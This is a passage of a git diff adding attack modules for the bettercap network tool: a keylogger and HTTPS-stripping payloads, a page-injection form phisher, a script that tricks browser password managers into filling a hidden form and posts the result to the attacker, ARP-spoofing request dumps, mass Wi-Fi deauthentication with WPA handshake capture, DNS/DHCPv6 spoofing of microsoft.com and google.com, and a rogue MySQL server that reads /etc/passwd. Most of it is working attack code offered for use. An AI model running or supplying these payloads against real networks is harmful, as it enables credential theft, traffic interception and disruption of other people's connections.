"SCRIPT": + obf_var_node.src + ? obf_var_url = obf_var_node.src + : ""; + break; + case "IFRAME": + obf_var_node.src + ? obf_var_url = obf_var_node.src + : ""; + break; + } + if (obf_var_url.match(/^\s*(?:http[s]?:)?\/\/[^:/?#]+/i)) { + var obf_var_parsed_url = obf_func_parseURL(obf_var_url), + obf_var_hijacked_host = obf_func_hijack(obf_var_parsed_url[1]); + if (obf_var_hijacked_host != obf_var_parsed_url[1]) { + if (obf_var_parsed_url[0].toLowerCase() === "https://") { + obf_var_parsed_url[0] = obf_var_parsed_url[0].replace(/(http)s:\/\//i, "$1://"); + } + if (obf_var_parsed_url[2] === ":443") { + obf_var_parsed_url[2] = ""; + } + } + var obf_var_hijacked_url = obf_var_parsed_url[0] + + obf_var_hijacked_host + + obf_var_parsed_url[2] + + obf_var_parsed_url[3] + + obf_var_parsed_url[4] + + obf_var_parsed_url[5]; + switch (obf_var_node.tagName) { + case "A": + if (obf_var_node.href) { + obf_var_node.href = obf_var_hijacked_url; + } + break; + case "FORM": + if (obf_var_node.action) { + obf_var_node.action = obf_var_hijacked_url; + } + break; + case "SCRIPT": + if (obf_var_node.src) { + obf_var_node.src = obf_var_hijacked_url; + } + break; + case "IFRAME": + if (obf_var_node.src) { + obf_var_node.src = obf_var_hijacked_url; + } + break; + } + obf_func_callback(obf_var_parsed_url[1].toLowerCase()); + } + } catch(obf_var_ignore) {} + }); + } + + try { + obf_func_hook_XMLHttpRequest(); + } catch(obf_var_ignore) {} + + try { + setInterval(obf_func_hook_nodes, 2000); + obf_func_hook_nodes(); + } catch(obf_var_ignore) {} + + try { + globalThis.addEventListener("load", obf_func_hook_nodes); + } catch(obf_var_ignore) {} + }); +})(); + diff --git a/hstshijack/payloads/keylogger.js b/hstshijack/payloads/keylogger.js new file mode 100644 index 0000000..2f9f00d --- /dev/null +++ b/hstshijack/payloads/keylogger.js @@ -0,0 +1,141 @@ +/* + Hooks the keyup event and onsubmit events of forms and disables form autocompletion. + + Remember that any occurrence of 'obf_path_ssl_log', 'obf_path_callback' and + 'obf_path_whitelist' in this payload will be replaced when the proxy module + loads and that variable names 'obf_var_target_hosts' and 'obf_var_replacement_hosts' + are already declared before this is injected. +*/ + + +(function(){ + "use strict"; + + var obf_var_keystrokes = []; + + function obf_func_random_string(obf_var_length) { + var obf_var_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", + obf_var_buff = new Array(obf_var_length); + for (var obf_var_i = 0; obf_var_i < obf_var_length; obf_var_i++) { + obf_var_buff[obf_var_i] = obf_var_chars.charAt(parseInt(Math.random() * obf_var_chars.length)); + } + return obf_var_buff.join(""); + } + + function obf_func_callback() { + try { + var obf_var_inputs = document.getElementsByTagName("input"), + obf_var_textareas = document.getElementsByTagName("textarea"), + obf_var_params = ""; + + for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) { + if (obf_var_inputs[obf_var_i].value != "") { + obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) + + "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) + + (obf_var_i < (obf_var_inputs.length-1) ? "&" : ""); + } + } + for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) { + if (obf_var_textareas[obf_var_i].value != "") { + obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) + + "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) + + (obf_var_i < (obf_var_textareas.length-1) ? "&" : ""); + } + } + if (obf_var_params !== "") { + obf_var_params += "&"; + } + obf_var_params += "obf_var_keystrokes=" + encodeURIComponent(obf_var_keystrokes.join(",")); + + if (obf_var_params.length > 0) { + var obf_var_req = new XMLHttpRequest(); + obf_var_req.open( + "POST", + "http://" + location.host + "obf_path_callback?" + obf_var_params, + true); + obf_var_req.send(); + } + } catch(obf_var_ignore){} + } + + function obf_func_callback_whitelist() { + try { + var obf_var_inputs = document.getElementsByTagName("input"), + obf_var_textareas = document.getElementsByTagName("textarea"), + obf_var_params = ""; + + for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) { + if (obf_var_inputs[obf_var_i].value != "") { + obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) + + "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) + + (obf_var_i < (obf_var_inputs.length-1) ? "&" : ""); + } + } + for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) { + if (obf_var_textareas[obf_var_i].value != "") { + obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) + + "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) + + (obf_var_i < (obf_var_textareas.length-1) ? "&" : ""); + } + } + + if (obf_var_params.length > 0) { + var obf_var_req = new XMLHttpRequest(); + obf_var_req.open( + "POST", + "http://" + location.host + "obf_path_whitelist?" + obf_var_params, + true); + obf_var_req.send(); + } + } catch(obf_var_ignore){} + } + + function obf_func_hook_keyup() { + globalThis.addEventListener("keydown", function(obf_var_event) { + try { + obf_var_keystrokes.push(obf_var_event.key); + obf_func_callback(); + } catch(obf_var_ignore){} + }); + } + + function obf_func_hook_forms() { + document.querySelectorAll("form").forEach(function(obf_var_form){ + // if (obf_var_form.querySelector("input[type=password]")) { + // obf_var_form.addEventListener("submit", obf_func_callback_whitelist); + // } else { + obf_var_form.addEventListener("submit", obf_func_callback); + // } + }); + } + + function obf_func_hook_inputs() { + document.querySelectorAll("input").forEach(function(obf_var_input){ + obf_var_input.autocomplete = "off"; + }); + } + + var obf_var_hooked_tag = obf_func_random_string(parseInt(8 + Math.random() * 8)); + + try { + obf_func_hook_keyup(); + } catch(obf_var_ignore){} + + try { + obf_func_hook_forms(); + } catch(obf_var_ignore){} + + try { + obf_func_hook_inputs(); + } catch(obf_var_ignore){} + + try { + globalThis.addEventListener("DOMContentLoaded", obf_func_hook_forms); + globalThis.addEventListener("DOMContentLoaded", obf_func_hook_inputs); + globalThis.addEventListener("load", obf_func_hook_forms); + globalThis.addEventListener("load", obf_func_hook_inputs); + setInterval(obf_func_hook_forms, 2000); + setInterval(obf_func_hook_inputs, 2000); + } catch(obf_var_ignore){} +})(); + diff --git a/hstshijack/payloads/sslstrip.js b/hstshijack/payloads/sslstrip.js new file mode 100644 index 0000000..79655fd --- /dev/null +++ b/hstshijack/payloads/sslstrip.js @@ -0,0 +1,72 @@ +/* + Hooks XMLHttpRequest as well as 'a', 'form', 'script' & 'iframe' nodes. + + Remember that any occurrence of 'obf_path_ssl_log', 'obf_path_callback' and + 'obf_path_whitelist' in this payload will be replaced when the proxy module + loads and that variable names 'obf_var_target_hosts' and 'obf_var_replacement_hosts' + are already declared before this is injected. +*/ + +(function(){ + "use strict"; + + var obf_func_open = XMLHttpRequest.prototype.open; + + function obf_func_hook_XMLHttpRequest() { + XMLHttpRequest.prototype.open = function( + obf_var_method, + obf_var_url, + obf_var_async, + obf_var_username, + obf_var_password + ) { + var obf_var_url = obf_var_url.replace(/(http)s/ig, "$1"); + return obf_func_open.apply(this, arguments); + } + } + + function obf_func_hook_nodes() { + document.querySelectorAll("a,iframe,script,form").forEach(function(obf_var_node){ + try { + switch (obf_var_node.tagName) { + case "A": + if (obf_var_node.href && obf_var_node.href.match(/^\s*https:/i)) { + obf_var_node.href = obf_var_node.href.replace(/(http)s/i, "$1"); + } + break; + case "IFRAME": + if (obf_var_node.src && obf_var_node.src.match(/^\s*https:/i)) { + obf_var_node.src = obf_var_node.src.replace(/(http)s/i, "$1"); + } + break; + case "SCRIPT": + if (obf_var_node.src && obf_var_node.src.match(/^\s*https:/i)) { + obf_var_node.src = obf_var_node.src.replace(/(http)s/i, "$1"); + } + break; + case "FORM": + if (obf_var_node.action && obf_var_node.action.match(/^\s*https:/i)) { + obf_var_node.action = obf_var_node.action.replace(/(http)s/i, "$1"); + } + break; + } + } catch(obf_var_ignore) {} + }); + } + + try { + obf_func_hook_XMLHttpRequest(); + } catch(obf_var_ignore) {} + + try { + obf_func_hook_nodes(); + } catch(obf_var_ignore) {} + + try { + obf_func_hook_XMLHttpRequest(); + globalThis.addEventListener("DOMContentLoaded", obf_func_hook_nodes); + globalThis.addEventListener("load", obf_func_hook_nodes); + setInterval(obf_func_hook_nodes, 4000); + } catch(obf_var_ignore) {} +})(); + diff --git a/http-req-dump/http-req-dump.cap b/http-req-dump/http-req-dump.cap new file mode 100644 index 0000000..18ed59f --- /dev/null +++ b/http-req-dump/http-req-dump.cap @@ -0,0 +1,27 @@ +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap -caplet http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64" + +# to make it less verbose +# events.stream off + +# discover a few hosts +net.probe on +sleep 1 +net.probe off + +# uncomment to enable sniffing too +# set net.sniff.verbose false +# set net.sniff.local true +# set net.sniff.filter tcp port 443 +# net.sniff on + +# we'll use this proxy script to dump requests +set https.proxy.script http-req-dump.js +set http.proxy.script http-req-dump.js +clear + +# go ^_^ +http.proxy on +https.proxy on +arp.spoof on diff --git a/http-req-dump/http-req-dump.js b/http-req-dump/http-req-dump.js new file mode 100644 index 0000000..ac8e996 --- /dev/null +++ b/http-req-dump/http-req-dump.js @@ -0,0 +1,222 @@ +var RESET = "\033[0m"; + +function R(s) { + return "\033[31m" + s + RESET; +} + +function G(s) { + return "\033[32m" + s + RESET; +} + +function B(s) { + return "\033[34m" + s + RESET; +} + +function Y(s) { + return "\033[33m" + s + RESET; +} + +function BLACK_BLUE(s) { + return "\033[104;30m" + s + RESET; +} + +function BLACK_RED(s) { + return "\033[41;30m" + s + RESET; +} + +function DIM(s) { + return "\033[2m" + s + RESET; +} + +function GREY(s) { + return "\033[30m" + s + RESET; +} + +function BOLD(s) { + return "\033[1m" + s + RESET; +} + +function dumpHeaders(req) { + headers = req.Headers.replace(/\r\n$/g, "").split("\r\n"); + + msg = "\n " + BOLD("Headers") + "\n\n"; + + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + header_value = headers[i].replace(/.*?: /, ""); + + msg += " " + G(header_name) + " => " + BOLD(header_value) + "\n"; + } + + console.log(msg); +} + +function dumpPlain(req) { + body = req.ReadBody(); + + if (req.Body.length > 0) { + console.log(" " + BOLD("Text") + "\n\n " + Y(body) + "\n"); + } +} + +function dumpForm(req) { + form = req.ParseForm(); + + if (Object.keys(form).length > 0) { + msg = " " + BOLD("Form") + "\n\n"; + + for (var key in form) { + msg += " " + B(strip(key)) + " : " + Y(strip(form[key])) + "\n"; + } + + console.log(msg); + } +} + +function dumpQuery(req) { + params = req.Query.split("&"); + + msg = " " + BOLD("Query") + "\n\n"; + + for (var i = 0; i < params.length; i++) { + param_name = params[i].split("=")[0]; + param_value = params[i].split("=")[1]; + + if (param_name != undefined && param_value != undefined && param_name.length > 0 && param_value.length > 0) { + try { + msg += " " + B(strip(decodeURIComponent(param_name))) + " : " + Y(strip(decodeURIComponent(param_value))) + "\n"; + } catch(err) { + msg += " " + B(strip(param_name)) + " : " + Y(strip(param_value)) + "\n"; + log_debug("could not decode URI parameter: " + err); + } + } else { + if (params[i].length > 0) { + try { + msg += " " + Y(strip(decodeURIComponent(params[i]))) + "\n"; + } catch(err) { + msg += " " + Y(strip(params[i])) + "\n"; + log_debug("could not decode URI parameter: " + err); + } + } + } + } + + console.log(msg); +} + +function dumpJSON(req) { + msg = " " + BOLD("JSON") + "\n\n"; + + var body = req.ReadBody(); + + if (req.Body.length > 0) { + try { + json = JSON.parse(body); + json_msg = JSON.stringify(json, null, 4); + + msg_lines = json_msg.split("\n"); + + for (var i = 0; i < msg_lines.length; i++) { + msg += " " + msg_lines[i].replace(/^(\s*)\{$/, "$1" + B("{")) + .replace(/^(\s*)\[$/, "$1" + B("[")) + .replace(/^(\s*)(".*?"): \{$/, "$1" + B("$2") + ": " + B("{")) + .replace(/^(\s*)(".*?"): \[$/, "$1" + B("$2") + ": " + B("[")) + .replace(/^(\s*)(".*?"): (.*?)(,$|$)/, "$1" + B("$2") + ": " + Y("$3") + "$4") + .replace(/^(\s*)(".*?")(,$|$)/, "$1" + Y("$2") + "$3") + .replace(/^(\s*)(\d*?)(,$|$)/, "$1" + Y("$2") + "$3") + .replace(/^(\s*)\](,$|$)/, "$1" + B("]") + "$2") + .replace(/^(\s*)\}(,$|$)/, "$1" + B("}") + "$2") + "\n"; + } + } catch(ignore) { + msg += " " + Y(body) + "\n"; + } + + console.log(msg); + } +} + +function dumpHex(raw) { + var DataSize = raw.length; + var Bytes = 16; + + msg = ""; + + for (var address = 0; address < DataSize; address++) { + var saddr = pad(address, 8, "0"); + var shex = ""; + var sprint = ""; + + var end = address + Bytes; + for (var i = address; i < end; i++) { + if (i < DataSize) { + shex += toHex(raw.charCodeAt(i)) + " "; + sprint += isPrint(raw[i]) ? raw[i] : "."; + } else { + shex += " "; + sprint += " "; + } + } + + address = end; + + msg += " " + G(saddr) + " " + shex + " " + sprint + "\n"; + } + + console.log(msg); +} + +function dumpRaw(req) { + var body = req.ReadBody(); + + if (body.length > 0) { + console.log(" " + BOLD("Body") + " " + DIM("(" + body.length + " bytes)") + "\n"); + + dumpHex(body); + } +} + +function pad(num, size, fill) { + var s = "" + num; + + while (s.length < size) { + s = fill + s; + } + + return s; +} + +function strip(s) { + return s.replace(/^\s*/, "").replace(/\s*$/, ""); +} + +function toHex(n) { + var hex = "0123456789abcdef"; + var h = hex[(0xF0 & n) >> 4] + hex[0x0F & n]; + return pad(h, 2, "0"); +} + +function isPrint(c) { + if (!c) { return false; } + var code = c.charCodeAt(0); + return (code > 31) && (code < 127); +} + +function onRequest(req, res) { + log("[" + G("http-req-dump") + "] " + BLACK_RED(req.Scheme) + " " + req.Client.IP + " " + BLACK_BLUE(req.Method) + " " + GREY(req.Scheme + "://") + Y(req.Hostname) + req.Path + (req.Query != "" ? GREY("?" + req.Query) : "")); + + dumpHeaders(req); + + if (req.Query.length > 0) { + dumpQuery(req); + } + + if (req.ContentType.indexOf("text/plain") != -1) { + dumpPlain(req); + } else if (req.ContentType.indexOf("application/x-www-form-urlencoded") != -1) { + dumpForm(req); + } else if (req.ContentType.indexOf("application/json") != -1) { + dumpJSON(req); + } else { + dumpRaw(req); + } +} diff --git a/http-ui.cap b/http-ui.cap new file mode 100644 index 0000000..bb64c8e --- /dev/null +++ b/http-ui.cap @@ -0,0 +1,15 @@ +# api listening on http://127.0.0.1:8081/ and ui to http://127.0.0.1 +set api.rest.address 127.0.0.1 +set api.rest.port 8081 +set http.server.address 127.0.0.1 +set http.server.port 80 +# default installation path of the ui +set http.server.path /usr/local/share/bettercap/ui + +# !!! CHANGE THESE !!! +set api.rest.username user +set api.rest.password pass + +# go! +api.rest on +http.server on diff --git a/https-ui.cap b/https-ui.cap new file mode 100644 index 0000000..81aaf3a --- /dev/null +++ b/https-ui.cap @@ -0,0 +1,21 @@ +# api listening on https://0.0.0.0:8083/ and ui on https://0.0.0.0 +set api.rest.address 0.0.0.0 +set api.rest.port 8083 +set https.server.address 0.0.0.0 +set https.server.port 443 + +# make sure both use the same https certificate so api requests won't fail +set https.server.certificate ~/.bettercap-https.cert.pem +set https.server.key ~/.bettercap-https.key.pem +set api.rest.certificate ~/.bettercap-https.cert.pem +set api.rest.key ~/.bettercap-https.key.pem +# default installation path of the ui +set https.server.path /usr/local/share/bettercap/ui + +# !!! CHANGE THESE !!! +set api.rest.username user +set api.rest.password pass + +# go! +api.rest on +https.server on diff --git a/jsinject/README.md b/jsinject/README.md new file mode 100644 index 0000000..68d1ab9 --- /dev/null +++ b/jsinject/README.md @@ -0,0 +1,25 @@ +### JS-INJECT + +A simple yet powerful proxy module that lets you inject your JavaScript payloads into any HTTP web page/application. + +It prevents re-initiation of your script when it's already active in the DOM by declaring your payload as a unique function variable, and in some cases ignores the `X-Content-Type-Options: nosniff` header by checking for both `Content-Type` headers and file extensions. + +All you have to do is set your payload path in the caplet file. + +**jsinject/jsinject.cap** + +```sh +# Set the path to your JavaScript payload +set jsinject.payload jsinject/payloads/form-phisher.js + +set http.proxy.script jsinject/jsinject.js +set net.sniff.verbose false +net.sniff on +http.proxy on +``` + +
+ +### Included payload + +form-phisher.js is included, which will wait for the victim to press a key before binding to the enter key, mouse click, screen tap and submit events in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc. diff --git a/jsinject/jsinject.cap b/jsinject/jsinject.cap new file mode 100644 index 0000000..98f7dfd --- /dev/null +++ b/jsinject/jsinject.cap @@ -0,0 +1,8 @@ +# Set the path to your JavaScript payload +set jsinject.payload jsinject/payloads/form-phisher.js + +set http.proxy.script jsinject/jsinject.js +set net.sniff.verbose false +net.sniff on +http.proxy on +#arp.spoof on diff --git a/jsinject/jsinject.js b/jsinject/jsinject.js new file mode 100644 index 0000000..3fc2325 --- /dev/null +++ b/jsinject/jsinject.js @@ -0,0 +1,51 @@ +var session_id, + payload, + payload_path, + payload_container = "" + + "if (!self.{{session_id}}) {\n" + + "var {{session_id}} = function() {\n" + + "{{payload}}\n" + + "}\n" + + "{{session_id}}();\n" + + "}\n" + +var green = "\033[32m", + bold = "\033[1;37m", + reset = "\033[0m" + +function randomString(length) { + var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", + buffer = "" + while (buffer.length < length) { + index = parseInt( Math.random() * chars.length ) + buffer = buffer + chars.charAt(index) + } + return buffer +} + +function configure() { + payload_path = env["jsinject.payload"].replace(/\s/g, "") + payload = readFile(payload_path) + payload = payload_container.replace("{{payload}}", payload).replace(/\{\{session_id\}\}/g, session_id) +} + +function onLoad() { + session_id = randomString( 4 + parseInt( Math.random() * 16 ) ) + configure() + log_info(green + "jsinject" + reset + " started injecting payload " + bold + payload_path + reset + " into HTTP traffic.") + log_info(green + "jsinject" + reset + " session ID is " + bold + session_id + reset + ".") +} + +function onResponse(req, res) { + configure() + if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/, "").match(/\.(htm|html)$/i) ) { + res.ReadBody() + log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document from " + bold + req.Hostname + reset + " ...") + res.Body = res.Body.replace(//i, "") + } + if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/, "").match(/\.js$/i) ) { + res.ReadBody() + log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document from " + bold + req.Hostname + reset + " ...") + res.Body = payload + res.Body + } +} diff --git a/jsinject/payloads/form-phisher.js b/jsinject/payloads/form-phisher.js new file mode 100644 index 0000000..43b24c9 --- /dev/null +++ b/jsinject/payloads/form-phisher.js @@ -0,0 +1,35 @@ +var hooked = false + +function callback() { + var inputs = document.getElementsByTagName("input"), + textareas = document.getElementsByTagName("textarea"), + params = "" + for (var i = 0; i < inputs.length; i++) { + if (inputs[i].value != "") { + params = params + inputs[i].name + "=" + inputs[i].value + ( i < (inputs.length-1) ? "&" : "" ) + } + } + for (var i = 0; i < textareas.length; i++) { + if (textareas[i].value != "") { + params = params + textareas[i].name + "=" + textareas[i].value + ( i < (textareas.length-1) ? "&" : "" ) + } + } + if (params.length > 0) { + req = new XMLHttpRequest() + req.open("POST", "http://" + location.host + "/bettercap_sniffer_callback?" + params, true) + req.send() + } +} + +self.addEventListener("keydown", function(event) { + (event.key == "Enter" || event.keyCode == 13) ? callback() : "" + if (hooked == false) { + self.addEventListener("click", callback) + self.addEventListener("touchend", callback) + forms = document.querySelectorAll("form") + for (var i = 0; i < forms.length; i++) { + forms[i].addEventListener("submit", callback) + } + hooked = true + } +}) diff --git a/local-sniffer.cap b/local-sniffer.cap new file mode 100644 index 0000000..c9c82b1 --- /dev/null +++ b/local-sniffer.cap @@ -0,0 +1,11 @@ +#events.stream off +events.clear +# set events.stream.filter net.sniff +# events.stream on + +set net.sniff.verbose false +set net.sniff.local true +# https://biot.com/capstats/bpf.html +# set net.sniff.filter not arp and not udp port 53 + +net.sniff on diff --git a/login-manager-abuse/login-man-abuse.cap b/login-manager-abuse/login-man-abuse.cap new file mode 100644 index 0000000..cf1bb78 --- /dev/null +++ b/login-manager-abuse/login-man-abuse.cap @@ -0,0 +1,12 @@ +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap -caplet login-man-abuse.cap -eval "set arp.spoof.targets 192.168.1.53" + +set http.proxy.script login-man-abuse.js +http.proxy on +sleep 1 +arp.spoof on + + + + diff --git a/login-manager-abuse/login-man-abuse.js b/login-manager-abuse/login-man-abuse.js new file mode 100644 index 0000000..a9c0b89 --- /dev/null +++ b/login-manager-abuse/login-man-abuse.js @@ -0,0 +1,51 @@ +/* + * Ref. + * - https://github.com/evilsocket/bettercap-proxy-modules/issues/72 + * - https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/ + * + * The idea: + * + * - On every html page, inject this invisible form who grabs credentials from login managers. + * - POST such credentials to /login-man-abuser, given we control the HTTP traffic, we'll intercept this request. + * - Intercept request, dump credentials, drop client to 404. + */ +var AbuserJavascript = ""; + +function onLoad() { + // log( "Loading abuser code from login-man-abuser.js" ); + AbuserJavascript = readFile("/usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuser.js") +} + +// here we intercept the ajax POST request with leaked credentials. +function onRequest(req, res) { + if( req.Method == 'POST' && req.Path == "/login-man-abuser" ) { + log( "[LOGIN MANAGER ABUSER]\n", req.ReadBody() ); + // this was just a fake request we needed to exfiltrate + // credentials to us, drop the connection with an empty 200. + headers = res.Headers.split("\r\n"); + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + res.RemoveHeader(header_name); + } + res.SetHeader("Connection", "close"); + res.Status = 200; + res.ContentType = "text/html"; + res.Body = ""; + } +} + +// inject the javascript in html pages +function onResponse(req, res) { + if( res.ContentType.indexOf('text/html') == 0 ){ + var body = res.ReadBody(); + if( body.indexOf('') != -1 ) { + res.Body = body.replace( + '', + '' + + '' + ); + } + } +} diff --git a/login-manager-abuse/login-man-abuser.js b/login-manager-abuse/login-man-abuser.js new file mode 100644 index 0000000..e4d329b --- /dev/null +++ b/login-manager-abuse/login-man-abuser.js @@ -0,0 +1,71 @@ +/* + * Ref. + * - https://github.com/evilsocket/bettercap-proxy-modules/issues/72 + * - https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/ + * + * The idea: + * + * - On every html page, inject this invisible form who grabs credentials from login managers. + * - POST such credentials to /login-man-abuser, given we control the HTTP traffic, well intercept this request. + * - Intercept request, dump credentials, drop client to 404. + */ +var AbuserJavascript = +var injectForm = function(visible) { +var container = document.createElement("div"); +if (!visible){ +container.style.display = "none"; +} +var form = document.createElement("form"); +form.attributes.autocomplete = "on"; +var emailInput = document.createElement("input"); +emailInput.attributes.vcard_name = "vCard.Email"; +emailInput.id = "email"; +emailInput.type = "email"; +emailInput.name = "email"; +form.appendChild(emailInput); +var passwordInput = document.createElement("input"); +passwordInput.id = "password"; +passwordInput.type = "password"; +passwordInput.name = "password"; +form.appendChild(passwordInput); +container.appendChild(form); +document.body.appendChild(container); +}; + +var doPOST = function(data) { +var xhr = new XMLHttpRequest(); + +xhr.open("POST", "/login-man-abuser"); +xhr.setRequestHeader("Content-Type", "application/json"); +xhr.onload = function() { +console.log("Enjoy your coffee!"); +}; + +xhr.send(JSON.stringify(data)); +}; + +var sniffInputField = function(fieldId){ +var inputElement = document.getElementById(fieldId); +if (inputElement.value.length){ +return {fieldId: inputElement.value}; +} +window.setTimeout(sniffInputField, 200, fieldId); // wait for 200ms +}; + +var sniffInputFields = function(){ +var inputs = document.getElementsByTagName("input"); +data = {}; +for (var i = 0; i < inputs.length; i++) { +console.log("Will try to sniff element with id: " + inputs[i].id); +output = stringsniffInputField(inputs[i].id); +data = Object.assign({}, data, output); +} +doPOST(data); +}; + +var sniffFormInfo = function(visible) { +injectForm(visible); +sniffInputFields(); +}; + +sniffFormInfo(false);; diff --git a/mana.cap b/mana.cap new file mode 100644 index 0000000..6e5e026 --- /dev/null +++ b/mana.cap @@ -0,0 +1 @@ +!berate_ap --no-virt --mana --mana-loud wlan1 wlan0 FreeWIFI diff --git a/massdeauth.cap b/massdeauth.cap new file mode 100644 index 0000000..dc491a5 --- /dev/null +++ b/massdeauth.cap @@ -0,0 +1,13 @@ +set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset} + +# every 10 seconds deauth every client from every ap +set ticker.period 10 +set ticker.commands clear; wifi.deauth ff:ff:ff:ff:ff:ff + +# uncomment to only hop on these channels: +# wifi.recon.channel 1,2,3 + +wifi.recon on +ticker on +events.clear +clear diff --git a/mitm6.cap b/mitm6.cap new file mode 100644 index 0000000..0398c87 --- /dev/null +++ b/mitm6.cap @@ -0,0 +1,20 @@ +# let's spoof Microsoft and Google ^_^ +set dns.spoof.domains microsoft.com, google.com +set dhcp6.spoof.domains microsoft.com, google.com + +# every http request to the spoofed hosts will come to us +# let's give em some contents +set http.server.path www + +# serve files +http.server on +# redirect DNS request by spoofing DHCPv6 packets +dhcp6.spoof on +# send spoofed DNS replies ^_^ +dns.spoof on + +# set a custom prompt for ipv6 +set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset} +# clear the events buffer and the screen +events.clear +clear diff --git a/netmon.cap b/netmon.cap new file mode 100644 index 0000000..d6d2ba5 --- /dev/null +++ b/netmon.cap @@ -0,0 +1,4 @@ +net.recon on +net.probe on +clear +ticker on diff --git a/pita.cap b/pita.cap new file mode 100644 index 0000000..237680a --- /dev/null +++ b/pita.cap @@ -0,0 +1,32 @@ +# More info about this caplet: https://twitter.com/evilsocket/status/1021367629901115392 + +set $ {bold}😈 » {reset} + +# make sure wlan0 is in monitor mode +# ref: https://github.com/offensive-security/kali-arm-build-scripts/blob/master/rpi3-nexmon.sh +!monstop +!monstart + +# every 5 seconds: +# - clear the screen +# - show the list of nearby access points +# - deauth every client from each one of them +set ticker.period 5 +set ticker.commands clear; wifi.show; wifi.deauth ff:ff:ff:ff:ff:ff +# sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file. +set net.sniff.verbose true +set net.sniff.filter ether proto 0x888e +set net.sniff.output wpa.pcap + +# uncomment to only hop on these channels: +# wifi.recon.channel 1,2,3 +wifi.recon on +ticker on +net.sniff on + +# we'll see lots of probes after each deauth, just skip the noise ... +events.ignore wifi.client.probe +# start fresh +events.clear +clear + diff --git a/proxy-script-test/proxy-script-test.cap b/proxy-script-test/proxy-script-test.cap new file mode 100644 index 0000000..02edc91 --- /dev/null +++ b/proxy-script-test/proxy-script-test.cap @@ -0,0 +1,2 @@ +set http.proxy.script proxy-script-test.js +http.proxy on diff --git a/proxy-script-test/proxy-script-test.js b/proxy-script-test/proxy-script-test.js new file mode 100644 index 0000000..b450ae6 --- /dev/null +++ b/proxy-script-test/proxy-script-test.js @@ -0,0 +1,49 @@ +// called when script is loaded +function onLoad() { + console.log( "PROXY SCRIPT LOADED" ); +} + +// called before a request is proxied +function onRequest(req, res) { + if( req.Path == "/test-page" ){ + headers = res.Headers.split("\r\n"); + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + res.RemoveHeader(header_name); + } + res.SetHeader("Server", "bettercap"); + res.SetHeader("Connection", "close"); + res.Status = 200; + res.ContentType = "text/html"; + res.Body = "" + + "" + + "Test Page" + + "" + + "" + + "
Hello world from bettercap!
" + + "" + + ""; + } +} + +// called after a request is proxied and there's a response +function onResponse(req, res) { + if( res.Status == 404 ){ + headers = res.Headers.split("\r\n"); + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + res.RemoveHeader(header_name); + } + res.SetHeader("Server", "bettercap"); + res.SetHeader("Connection", "close"); + res.ContentType = "text/html"; + res.Body = "" + + "" + + "Test 404 Page" + + "" + + "" + + "
Custom 404 from bettercap.
" + + "" + + ""; + } +} diff --git a/pwnagotchi-auto.cap b/pwnagotchi-auto.cap new file mode 100644 index 0000000..1d5530e --- /dev/null +++ b/pwnagotchi-auto.cap @@ -0,0 +1,12 @@ +# enable interface monitor mode and define wifi interface to be mon0 +set wifi.interface wlan0mon + +# api listening on http://127.0.0.1:8081/ and ui to http://127.0.0.1 +set api.rest.address 127.0.0.1 +set api.rest.port 8081 +set api.rest.username pwnagotchi +set api.rest.password pwnagotchi +set api.rest.websocket true + +# go! +api.rest on diff --git a/pwnagotchi-manual.cap b/pwnagotchi-manual.cap new file mode 100644 index 0000000..e501b38 --- /dev/null +++ b/pwnagotchi-manual.cap @@ -0,0 +1,16 @@ +# enable interface monitor mode and define wifi interface to be mon0 +set wifi.interface wlan0mon + +# api listening on http://0.0.0.0:8081/ and ui to http://0.0.0.0 +set api.rest.address 0.0.0.0 +set api.rest.port 8081 +set http.server.address 0.0.0.0 +set http.server.port 80 +set http.server.path /usr/local/share/bettercap/ui +set api.rest.username pwnagotchi +set api.rest.password pwnagotchi +set api.rest.websocket true + +# go! +api.rest on +http.server on diff --git a/rogue-mysql-server.cap b/rogue-mysql-server.cap new file mode 100644 index 0000000..9d6efea --- /dev/null +++ b/rogue-mysql-server.cap @@ -0,0 +1,21 @@ +# set the target for arp spoofing +set arp.spoof.targets 192.168.1.236 + +# bind rogue mysql server to localhost and +# set the file we want to read +set mysql.server.address 127.0.0.1 +set mysql.server.port 3306 +set mysql.server.infile /etc/passwd +mysql.server on + +# set the ip from the mysql server we want to impersonate +set tcp.address 93.184.216.34 +set tcp.port 3306 + +# set the ip from the rogue mysql server +set tcp.tunnel.address 127.0.0.1 +set tcp.tunnel.port 3306 + +# go ^_^ +tcp.proxy on +arp.spoof on \ No newline at end of file diff --git 